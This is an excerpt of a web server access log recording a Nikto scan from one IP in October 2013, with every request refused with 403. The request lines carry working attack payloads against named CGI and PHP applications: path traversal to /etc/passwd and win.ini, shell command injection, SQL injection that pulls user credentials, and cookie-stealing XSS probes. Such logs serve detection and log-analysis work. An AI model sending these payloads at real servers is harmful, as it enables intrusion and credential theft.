  1064. 84.56.69.222 - - [23/Oct/2013:15:37:39 +0400] "GET /webcgi/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000624)"
  1065. 84.56.69.222 - - [23/Oct/2013:15:37:39 +0400] "GET /scripts/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000624)"
  1066. 84.56.69.222 - - [23/Oct/2013:15:37:43 +0400] "GET /webcgi/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000625)"
  1067. 84.56.69.222 - - [23/Oct/2013:15:37:44 +0400] "GET /scripts/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000625)"
  1068. 84.56.69.222 - - [23/Oct/2013:15:37:45 +0400] "GET /webcgi/php.cgi?/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000626)"
  1069. 84.56.69.222 - - [23/Oct/2013:15:37:52 +0400] "GET /scripts/php.cgi?/etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000626)"
  1070. 84.56.69.222 - - [23/Oct/2013:15:37:52 +0400] "GET /webcgi/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000627)"
  1071. 84.56.69.222 - - [23/Oct/2013:15:37:52 +0400] "GET /scripts/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000627)"
  1072. 84.56.69.222 - - [23/Oct/2013:15:37:53 +0400] "GET /webcgi/opendir.php?/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000628)"
  1073. 84.56.69.222 - - [23/Oct/2013:15:37:53 +0400] "GET /scripts/opendir.php?/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000628)"
  1074. 84.56.69.222 - - [23/Oct/2013:15:37:53 +0400] "GET /webcgi/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000629)"
  1075. 84.56.69.222 - - [23/Oct/2013:15:37:53 +0400] "GET /scripts/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000629)"
  1076. 84.56.69.222 - - [23/Oct/2013:15:37:53 +0400] "GET /webcgi/newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000630)"
  1077. 84.56.69.222 - - [23/Oct/2013:15:37:54 +0400] "GET /scripts/newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000630)"
  1078. 84.56.69.222 - - [23/Oct/2013:15:37:56 +0400] "GET /webcgi/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000631)"
  1079. 84.56.69.222 - - [23/Oct/2013:15:37:58 +0400] "GET /scripts/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000631)"
  1080. 84.56.69.222 - - [23/Oct/2013:15:37:59 +0400] "GET /webcgi/multihtml.pl?multi=/etc/passwd%00html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000632)"
  1081. 84.56.69.222 - - [23/Oct/2013:15:37:59 +0400] "GET /scripts/multihtml.pl?multi=/etc/passwd%00html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000632)"
  1082. 84.56.69.222 - - [23/Oct/2013:15:37:59 +0400] "GET /webcgi/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000633)"
  1083. 84.56.69.222 - - [23/Oct/2013:15:37:59 +0400] "GET /scripts/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000633)"
  1084. 84.56.69.222 - - [23/Oct/2013:15:38:00 +0400] "GET /webcgi/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000634)"
  1085. 84.56.69.222 - - [23/Oct/2013:15:38:00 +0400] "GET /scripts/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000634)"
  1086. 84.56.69.222 - - [23/Oct/2013:15:38:00 +0400] "GET /webcgi/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000635)"
  1087. 84.56.69.222 - - [23/Oct/2013:15:38:00 +0400] "GET /scripts/way-board.cgi?db=/etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000635)"
  1088. 84.56.69.222 - - [23/Oct/2013:15:38:01 +0400] "GET /webcgi/viewsource?/etc/passwd HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000637)"
  1089. 84.56.69.222 - - [23/Oct/2013:15:38:02 +0400] "GET /scripts/viewsource?/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000637)"
  1090. 84.56.69.222 - - [23/Oct/2013:15:38:02 +0400] "GET /webcgi/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000638)"
  1091. 84.56.69.222 - - [23/Oct/2013:15:38:02 +0400] "GET /scripts/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000638)"
  1092. 84.56.69.222 - - [23/Oct/2013:15:38:02 +0400] "GET /webcgi/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000639)"
  1093. 84.56.69.222 - - [23/Oct/2013:15:38:03 +0400] "GET /scripts/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000639)"
  1094. 84.56.69.222 - - [23/Oct/2013:15:38:03 +0400] "GET /webcgi/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000640)"
  1095. 84.56.69.222 - - [23/Oct/2013:15:38:04 +0400] "GET /scripts/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000640)"
  1096. 84.56.69.222 - - [23/Oct/2013:15:38:04 +0400] "GET /webcgi/technote/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=/../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000640)"
  1097. 84.56.69.222 - - [23/Oct/2013:15:38:04 +0400] "GET /scripts/technote/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=/../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000640)"
  1098. 84.56.69.222 - - [23/Oct/2013:15:38:04 +0400] "GET /webcgi/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000641)"
  1099. 84.56.69.222 - - [23/Oct/2013:15:38:05 +0400] "GET /scripts/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000641)"
  1100. 84.56.69.222 - - [23/Oct/2013:15:38:05 +0400] "GET /webcgi/story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000642)"
  1101. 84.56.69.222 - - [23/Oct/2013:15:38:05 +0400] "GET /scripts/story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000642)"
  1102. 84.56.69.222 - - [23/Oct/2013:15:38:05 +0400] "GET /webcgi/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000643)"
  1103. 84.56.69.222 - - [23/Oct/2013:15:38:06 +0400] "GET /scripts/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000643)"
  1104. 84.56.69.222 - - [23/Oct/2013:15:38:06 +0400] "GET /webcgi/store/index.cgi?page=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000644)"
  1105. 84.56.69.222 - - [23/Oct/2013:15:38:06 +0400] "GET /scripts/store/index.cgi?page=../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000644)"
  1106. 84.56.69.222 - - [23/Oct/2013:15:38:06 +0400] "GET /webcgi/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000645)"
  1107. 84.56.69.222 - - [23/Oct/2013:15:38:06 +0400] "GET /scripts/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000645)"
  1108. 84.56.69.222 - - [23/Oct/2013:15:38:14 +0400] "GET /webcgi/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000647)"
  1109. 84.56.69.222 - - [23/Oct/2013:15:38:14 +0400] "GET /scripts/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000647)"
  1110. 84.56.69.222 - - [23/Oct/2013:15:38:15 +0400] "GET /webcgi/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000648)"
  1111. 84.56.69.222 - - [23/Oct/2013:15:38:16 +0400] "GET /scripts/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000648)"
  1112. 84.56.69.222 - - [23/Oct/2013:15:38:16 +0400] "GET /webcgi/shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000649)"
  1113. 84.56.69.222 - - [23/Oct/2013:15:38:16 +0400] "GET /scripts/shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000649)"
  1114. 84.56.69.222 - - [23/Oct/2013:15:38:16 +0400] "GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000650)"
  1115. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000651)"
  1116. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000652)"
  1117. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /webcgi/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000653)"
  1118. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /scripts/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000653)"
  1119. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /page.cgi?../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000654)"
  1120. 84.56.69.222 - - [23/Oct/2013:15:38:17 +0400] "GET /edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000655)"
  1121. 84.56.69.222 - - [23/Oct/2013:15:38:18 +0400] "GET /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000656)"
  1122. 84.56.69.222 - - [23/Oct/2013:15:38:25 +0400] "GET /webcgi/zml.cgi?file=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000659)"
  1123. 84.56.69.222 - - [23/Oct/2013:15:38:25 +0400] "GET /scripts/zml.cgi?file=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000659)"
  1124. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /webcgi/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000660)"
  1125. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /scripts/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000660)"
  1126. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /webcgi/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000661)"
  1127. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /scripts/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000661)"
  1128. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /webcgi/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000662)"
  1129. 84.56.69.222 - - [23/Oct/2013:15:38:26 +0400] "GET /scripts/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000662)"
  1130. 84.56.69.222 - - [23/Oct/2013:15:38:27 +0400] "GET /webcgi/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000663)"
  1131. 84.56.69.222 - - [23/Oct/2013:15:38:27 +0400] "GET /scripts/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000663)"
  1132. 84.56.69.222 - - [23/Oct/2013:15:38:27 +0400] "GET /webcgi/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000664)"
  1133. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /scripts/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000664)"
  1134. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /webcgi/webplus?script=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000665)"
  1135. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /scripts/webplus?script=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000665)"
  1136. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /webcgi/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000666)"
  1137. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /scripts/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000666)"
  1138. 84.56.69.222 - - [23/Oct/2013:15:38:28 +0400] "GET /athenareg.php?pass=%20;cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000667)"
  1139. 84.56.69.222 - - [23/Oct/2013:15:38:29 +0400] "GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000668)"
  1140. 84.56.69.222 - - [23/Oct/2013:15:38:29 +0400] "GET /search?NS-query-pat=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000669)"
  1141. 84.56.69.222 - - [23/Oct/2013:15:38:29 +0400] "GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000670)"
  1142. 84.56.69.222 - - [23/Oct/2013:15:38:30 +0400] "GET /..\\..\\..\\..\\..\\..\\temp\\temp.class HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000671)"
  1143. 84.56.69.222 - - [23/Oct/2013:15:38:30 +0400] "GET /.../.../.../.../.../.../.../.../.../boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000673)"
  1144. 84.56.69.222 - - [23/Oct/2013:15:38:30 +0400] "GET /................../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000674)"
  1145. 84.56.69.222 - - [23/Oct/2013:15:38:30 +0400] "GET /%3f.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000675)"
  1146. 84.56.69.222 - - [23/Oct/2013:15:38:42 +0400] "GET /ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000680)"
  1147. 84.56.69.222 - - [23/Oct/2013:15:38:42 +0400] "GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000681)"
  1148. 84.56.69.222 - - [23/Oct/2013:15:38:43 +0400] "GET /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000682)"
  1149. 84.56.69.222 - - [23/Oct/2013:15:38:43 +0400] "GET /admentor/adminadmin.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000683)"
  1150. 84.56.69.222 - - [23/Oct/2013:15:38:43 +0400] "GET /webcgi/classifieds/index.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000685)"
  1151. 84.56.69.222 - - [23/Oct/2013:15:38:43 +0400] "GET /scripts/classifieds/index.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000685)"
  1152. 84.56.69.222 - - [23/Oct/2013:15:38:43 +0400] "GET /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000686)"
  1153. 84.56.69.222 - - [23/Oct/2013:15:38:44 +0400] "GET /userinfo.php?uid=1; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000687)"
  1154. 84.56.69.222 - - [23/Oct/2013:15:38:44 +0400] "GET /site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000688)"
  1155. 84.56.69.222 - - [23/Oct/2013:15:38:44 +0400] "GET /site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000689)"
  1156. 84.56.69.222 - - [23/Oct/2013:15:38:44 +0400] "GET /postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000690)"
  1157. 84.56.69.222 - - [23/Oct/2013:15:38:45 +0400] "GET /postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000691)"
  1158. 84.56.69.222 - - [23/Oct/2013:15:38:45 +0400] "GET /webcgi/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000692)"
  1159. 84.56.69.222 - - [23/Oct/2013:15:38:45 +0400] "GET /scripts/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000692)"
  1160. 84.56.69.222 - - [23/Oct/2013:15:38:45 +0400] "GET /phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000693)"
  1161. 84.56.69.222 - - [23/Oct/2013:15:38:45 +0400] "GET /phpBB2/search.php?search_id=1\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000694)"
  1162. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000695)"
  1163. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /author.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000696)"
  1164. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000697)"
  1165. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /imp/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000698)"
  1166. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /webcgi/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000699)"
  1167. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /scripts/horde/test.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000699)"
  1168. 84.56.69.222 - - [23/Oct/2013:15:38:46 +0400] "GET /examples/cookie HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000700)"
  1169. 84.56.69.222 - - [23/Oct/2013:15:38:47 +0400] "GET /examples/session HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000701)"
  1170. 84.56.69.222 - - [23/Oct/2013:15:38:50 +0400] "GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000702)"
  1171. 84.56.69.222 - - [23/Oct/2013:15:38:50 +0400] "GET /index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000703)"
  1172. 84.56.69.222 - - [23/Oct/2013:15:38:50 +0400] "GET /emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000704)"
  1173. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000705)"
  1174. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000706)"
  1175. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000707)"
  1176. 84.56.69.222 - - [23/Oct/2013:15:38:51 +0400] "GET /administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000708)"
